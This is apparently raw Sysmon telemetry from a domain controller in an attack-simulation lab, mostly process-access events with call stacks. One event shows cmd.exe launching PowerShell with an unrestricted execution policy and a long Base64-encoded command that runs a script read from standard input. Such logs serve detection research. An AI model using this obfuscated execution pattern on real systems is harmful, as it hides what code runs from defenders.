15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7CA7-5FA1-9300-000000008801}11641244C:\Windows\system32\cmd.exe{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.231{D28789B6-7CA7-5FA1-9400-000000008801}1252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CA7-5FA1-9300-000000008801}1164C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.229{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA7-5FA1-9300-000000008801}1164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:07.213{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 